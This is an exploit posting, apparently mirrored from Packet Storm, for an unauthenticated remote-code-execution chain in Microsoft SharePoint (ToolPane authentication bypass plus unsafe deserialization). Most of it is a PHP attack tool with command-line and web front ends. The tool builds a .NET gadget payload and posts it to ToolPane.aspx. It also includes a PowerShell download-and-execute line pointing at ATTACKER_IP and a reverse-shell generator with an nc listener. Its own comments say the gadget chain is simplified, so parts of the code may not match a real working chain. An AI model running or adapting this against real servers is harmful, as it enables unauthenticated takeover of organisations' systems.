Share
## https://sploitus.com/exploit?id=PACKETSTORM:212316
=============================================================================================================================================
    | # Title     : Microsoft SharePoint Server ToolPane Authentication Bypass + Unsafe Deserialization                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.microsoft.com/en-us/microsoft-365/sharepoint/                                                                   |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/207935/ & 	CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771
    
    [+] Summary : 
              
               critical unauthenticated remote code execution vulnerabilities in Microsoft SharePoint Server. The vulnerability chain combines authentication bypass vulnerabilities 
    		   (CVE-2025-49706 and CVE-2025-53771) with an unsafe deserialization vulnerability (CVE-2025-49704) to achieve complete system compromise without authentication.
    		  
    [+] Affected Components
    
    # Authentication Bypass Endpoint
    
    POST /_layouts/15/ToolPane.aspx/RANDOM_PATH
    
    # Deserialization Trigger
    
    ExcelDataSet Control with CompressedDataTable
    
    Vulnerability Chain
    
    1. Authentication Bypass via CVE-2025-49706 & CVE-2025-53771
    2. Access ToolPane.aspx with arbitrary parameters
    3. Trigger unsafe deserialization via CVE-2025-49704
    4. Execute .NET gadget chain for code execution
    5. Achieve RCE as SharePoint application pool identity
    
    [+]  POC : php poc.php
    
    # Vulnerability Scan
    
    php poc.php -t http://sharepoint.company.com`
    
    # Execute Command
    
    php poc.php -t http://sharepoint.company.com -c 'whoami'`
    
    # Create PowerShell Payload
    
    php poc.php --generate -l 192.168.1.100 -r 4444`
    
    Via Browser:
    
    https://yourserver.com/exploit.php
    
    <?php
    /**
     * Author: indoushka
     * Vulnerabilities: Authentication Bypass + Unsafe Deserialization
     */
    
    class SharePointExploit {
        private $target;
        private $base_path;
        
        public function __construct($target_url, $base_path = '/') {
            $this->target = rtrim($target_url, '/');
            $this->base_path = rtrim($base_path, '/');
        }
        
        public function check_vulnerability() {
            echo "[*] Checking SharePoint version and vulnerability...\n";
            
            $url = $this->target . $this->base_path . '/_layouts/15/start.aspx';
            
            $context = stream_context_create([
                'http' => [
                    'method' => 'GET',
                    'timeout' => 10,
                    'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
                ]
            ]);
            
            $response = @file_get_contents($url, false, $context);
            
            if ($response === false) {
                echo "[-] Could not connect to SharePoint\n";
                return false;
            }
            
            // Extract siteClientTag from JavaScript
            preg_match('/"*siteClientTag"*\s*:\s*"\d*[$]+([^"]+)",/', $response, $matches);
            
            if (!isset($matches[1])) {
                echo "[-] Could not determine SharePoint version\n";
                return false;
            }
            
            $version = $matches[1];
            echo "[+] SharePoint version detected: {$version}\n";
            
            // Check if version is vulnerable
            $vulnerable_versions = [
                '16.0.14326.20450' => '16.0.18526.20424', // SharePoint Subscription Edition
                '16.0.10337.12109' => '16.0.10417.20027', // SharePoint 2019
                '16.0.4351.1000'   => '16.0.5508.1000',   // SharePoint 2016
            ];
            
            foreach ($vulnerable_versions as $min_version => $max_version) {
                if (version_compare($version, $min_version, '>=') && 
                    version_compare($version, $max_version, '<=')) {
                    echo "[+] Version appears to be VULNERABLE!\n";
                    return true;
                }
            }
            
            echo "[-] Version appears to be PATCHED\n";
            return false;
        }
        
        public function exploit($command = 'whoami') {
            echo "[*] Exploiting SharePoint ToolPane vulnerabilities...\n";
            
            // Step 1: Create the gadget chain
            $gadget_chain = $this->create_gadget_chain($command);
            if (!$gadget_chain) {
                echo "[-] Failed to create gadget chain\n";
                return false;
            }
            
            // Step 2: Send the exploit
            $result = $this->send_exploit($gadget_chain);
            
            if ($result) {
                echo "[+] Exploit sent successfully\n";
                // Note: Command output may not be directly visible
                echo "[+] Check your listener for reverse shell\n";
            } else {
                echo "[-] Exploit failed\n";
            }
            
            return $result;
        }
        
        private function create_gadget_chain($command) {
            echo "[*] Creating .NET deserialization gadget chain...\n";
            
            // For demonstration, we'll create a simple command execution payload
            // In a real scenario, this would be a complex .NET deserialization chain
            
            $payload = base64_encode($this->generate_payload($command));
            
            // Create the DataSet wrapper with the payload
            $name_a = $this->random_string(8);
            $name_b = $this->random_string(8);
            $name_c = $this->random_string(8);
            
            $schema = <<<XML
    <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="{$name_a}">
        <xs:element name="{$name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
            <xs:complexType>
                <xs:choice minOccurs="0" maxOccurs="unbounded">
                    <xs:element name="{$name_b}">
                        <xs:complexType>
                            <xs:sequence>
                                <xs:element name="{$name_c}" msdata:DataType="System.Collections.Generic.List`1[[System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
                            </xs:sequence>
                        </xs:complexType>
                    </xs:element>
                </xs:choice>
            </xs:complexType>
        </xs:element>
    </xs:schema>
    XML;
    
            $diffgram = <<<XML
    <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
        <{$name_a}>
            <{$name_b} diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
                <{$name_c} xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
                    <ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
                        <ExpandedElement/>
                        <ProjectedProperty0>
                            <MethodName>Deserialize</MethodName>
                            <MethodParameters>
                                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{$payload}</anyType>
                            </MethodParameters>
                            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
                        </ProjectedProperty0>
                    </ExpandedWrapperOfLosFormatterObjectDataProvider>
                </{$name_c}>
            </{$name_b}>
        </{$name_a}>
    </diffgr:diffgram>
    XML;
    
            // Combine into the final gadget chain
            $gadget_chain = $schema . $diffgram;
            
            return $gadget_chain;
        }
        
        private function generate_payload($command) {
            // Generate a simple PowerShell payload
            // In a real exploit, this would be a proper .NET deserialization payload
            
            $powershell_cmd = base64_encode("iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/payload.ps1')");
            
            $payload = <<<PS
    powershell -enc {$powershell_cmd}
    PS;
            
            return $payload;
        }
        
        private function send_exploit($gadget_chain) {
            echo "[*] Sending exploit to ToolPane.aspx...\n";
            
            $random_path = $this->random_string(8);
            $random_param = $this->random_string(8);
            
            $namespace_ui = $this->random_string(8);
            $namespace_scorecards = $this->random_string(8);
            
            // Compress the gadget chain
            $compressed_gadget = gzencode($gadget_chain);
            $encoded_gadget = base64_encode($compressed_gadget);
            
            // Create the XML payload
            $xml = <<<XML
    <%@ Register Tagprefix="{$namespace_ui}" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
    <%@ Register Tagprefix="{$namespace_scorecards}" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
        <{$namespace_ui}:UpdateProgress>
          <ProgressTemplate>
            <{$namespace_scorecards}:ExcelDataSet CompressedDataTable="{$encoded_gadget}" DataTable-CaseSensitive="true" runat="server"/>
          </ProgressTemplate>
        </{$namespace_ui}:UpdateProgress>
    XML;
    
            $url = $this->target . $this->base_path . "/_layouts/15/ToolPane.aspx/{$random_path}";
            
            $post_data = http_build_query([
                'MSOTlPn_Uri' => $this->target . $this->base_path . '/_controltemplates/15/AclEditor.ascx',
                'MSOTlPn_DWP' => $xml
            ]);
            
            $get_params = http_build_query([
                'DisplayMode' => 'Edit',
                $random_param => '/ToolPane.aspx'
            ]);
            
            $full_url = $url . '?' . $get_params;
            
            $headers = [
                'Referer: ' . $this->target . $this->base_path . '/_layouts/SignOut.aspx',
                'Content-Type: application/x-www-form-urlencoded',
                'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ];
            
            $context = stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => implode("\r\n", $headers),
                    'content' => $post_data,
                    'timeout' => 15,
                    'ignore_errors' => true
                ]
            ]);
            
            $response = @file_get_contents($full_url, false, $context);
            
            if ($response === false) {
                return false;
            }
            
            // Check for successful exploitation indicators
            if (strpos($response, 'error') === false) {
                return true;
            }
            
            return false;
        }
        
        private function random_string($length = 8) {
            $characters = 'abcdefghijklmnopqrstuvwxyz';
            $result = '';
            for ($i = 0; $i < $length; $i++) {
                $result .= $characters[rand(0, strlen($characters) - 1)];
            }
            return $result;
        }
        
        public function generate_powershell_payload($lhost, $lport) {
            $payload = <<<PS
    \$client = New-Object System.Net.Sockets.TCPClient('{$lhost}',{$lport});
    \$stream = \$client.GetStream();
    [byte[]]\$bytes = 0..65535|%{0};
    while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){
        \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);
        \$sendback = (iex \$data 2>&1 | Out-String );
        \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';
        \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);
        \$stream.Write(\$sendbyte,0,\$sendbyte.Length);
        \$stream.Flush();
    }
    \$client.Close();
    PS;
            
            $encoded = base64_encode($payload);
            file_put_contents('payload.ps1', $payload);
            
            echo "[+] PowerShell payload created: payload.ps1\n";
            echo "[+] Use command: powershell -enc {$encoded}\n";
            echo "[+] Start listener: nc -lvnp {$lport}\n";
            
            return $encoded;
        }
    }
    
    // Command line interface
    if (php_sapi_name() === 'cli') {
        echo "
    โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— 
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆ   โ–ˆโ•”โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•
        
        SharePoint ToolPane Unauthenticated RCE Exploit
        CVE-2025-49706, CVE-2025-53771, CVE-2025-49704
            \n";
        
        $options = getopt("t:p:c:l:r:gh", [
            "target:",
            "path:",
            "command:",
            "lhost:",
            "lport:",
            "generate",
            "help"
        ]);
        
        if (isset($options['h']) || isset($options['help']) || $argc == 1) {
            echo "Usage: php poc.php [options]\n";
            echo "Options:\n";
            echo "  -t, --target        Target URL (required)\n";
            echo "  -p, --path          Base path (default: /)\n";
            echo "  -c, --command       Command to execute\n";
            echo "  -l, --lhost         Listener IP for reverse shell\n";
            echo "  -r, --lport         Listener port for reverse shell\n";
            echo "  -g, --generate      Generate PowerShell payload only\n";
            echo "  -h, --help          Show this help message\n";
            echo "\nExamples:\n";
            echo "  php poc.php -t http://sharepoint.company.com -c 'whoami'\n";
            echo "  php poc.php -t http://sharepoint.company.com -l 192.168.1.100 -r 4444\n";
            echo "  php poc.php --generate -l 192.168.1.100 -r 4444\n";
            exit(1);
        }
        
        if (isset($options['g']) || isset($options['generate'])) {
            if (!isset($options['l']) && !isset($options['lhost'])) {
                echo "Error: LHOST is required for payload generation\n";
                exit(1);
            }
            
            $lhost = isset($options['l']) ? $options['l'] : $options['lhost'];
            $lport = isset($options['r']) ? $options['r'] : (isset($options['lport']) ? $options['lport'] : 4444);
            
            $exploit = new SharePointExploit('');
            $exploit->generate_powershell_payload($lhost, $lport);
            exit(0);
        }
        
        if (!isset($options['t']) && !isset($options['target'])) {
            echo "Error: Target URL is required\n";
            exit(1);
        }
        
        $target = isset($options['t']) ? $options['t'] : $options['target'];
        $path = isset($options['p']) ? $options['p'] : (isset($options['path']) ? $options['path'] : '/');
        $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');
        
        $exploit = new SharePointExploit($target, $path);
        
        // Check vulnerability first
        if (!$exploit->check_vulnerability()) {
            echo "[-] Target does not appear to be vulnerable\n";
            exit(1);
        }
        
        // Execute exploit
        $exploit->exploit($command);
        
    } else {
        // Web interface
        if (isset($_POST['exploit'])) {
            $target = $_POST['target'] ?? '';
            $path = $_POST['path'] ?? '/';
            $command = $_POST['command'] ?? 'whoami';
            
            if ($target) {
                $exploit = new SharePointExploit($target, $path);
                
                ob_start();
                $exploit->check_vulnerability();
                $exploit->exploit($command);
                $output = ob_get_clean();
                
                echo "<pre>$output</pre>";
            } else {
                echo "<div style='color: red;'>Target URL is required</div>";
            }
        } else {
            echo '<!DOCTYPE html>
            <html>
            <head>
                <title>SharePoint RCE Exploit</title>
                <style>
                    body { font-family: Arial, sans-serif; margin: 40px; }
                    .container { max-width: 600px; margin: 0 auto; }
                    .form-group { margin-bottom: 15px; }
                    label { display: block; margin-bottom: 5px; font-weight: bold; }
                    input[type="text"] { 
                        width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px; 
                    }
                    button { 
                        background: #007cba; color: white; padding: 10px 20px; 
                        border: none; border-radius: 4px; cursor: pointer; 
                    }
                </style>
            </head>
            <body>
                <div class="container">
                    <h1>SharePoint ToolPane RCE Exploit</h1>
                    <form method="post">
                        <input type="hidden" name="exploit" value="1">
                        
                        <div class="form-group">
                            <label for="target">Target URL:</label>
                            <input type="text" id="target" name="target" placeholder="http://sharepoint.company.com" required>
                        </div>
                        
                        <div class="form-group">
                            <label for="path">Base Path:</label>
                            <input type="text" id="path" name="path" value="/">
                        </div>
                        
                        <div class="form-group">
                            <label for="command">Command:</label>
                            <input type="text" id="command" name="command" value="whoami">
                        </div>
                        
                        <button type="submit">Execute Exploit</button>
                    </form>
                </div>
            </body>
            </html>';
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================